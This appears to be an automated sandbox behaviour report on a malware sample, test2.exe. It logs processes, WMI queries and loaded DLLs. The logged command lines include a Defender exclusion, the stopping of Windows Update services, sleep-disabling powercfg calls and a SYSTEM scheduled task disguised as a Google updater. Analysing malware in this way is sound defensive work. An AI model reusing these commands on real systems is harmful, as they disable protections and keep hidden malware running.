      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1184:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1184:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6500:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5152:120:WilError_03
      Source: C:\Users\user\Desktop\test2.exeFile created: C:\Users\user\AppData\Local\Temp\kkldhmzqxige.tmpJump to behavior
      Source: test2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\System32\powercfg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
      Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
      Source: C:\Users\user\Desktop\test2.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: test2.exeVirustotal: Detection: 54%
      Source: C:\Users\user\Desktop\test2.exeFile read: C:\Users\user\Desktop\test2.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\test2.exe "C:\Users\user\Desktop\test2.exe"
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\test2.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
      Source: unknownProcess created: C:\Program Files\Google\Chrome\updater.exe "C:\Program Files\Google\Chrome\updater.exe"
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
      Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
      Source: C:\Windows\System32\dialer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
      Source: C:\Users\user\Desktop\test2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
      Source: C:\Users\user\Desktop\test2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvcJump to behavior
      Source: C:\Users\user\Desktop\test2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
      Source: C:\Users\user\Desktop\test2.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
      Source: C:\Users\user\Desktop\test2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }Jump to behavior
      Source: C:\Users\user\Desktop\test2.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvcJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvcJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauservJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bitsJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvcJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
      Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
      Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
      Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yaqvbk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
      Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\dialer.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\dialer.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
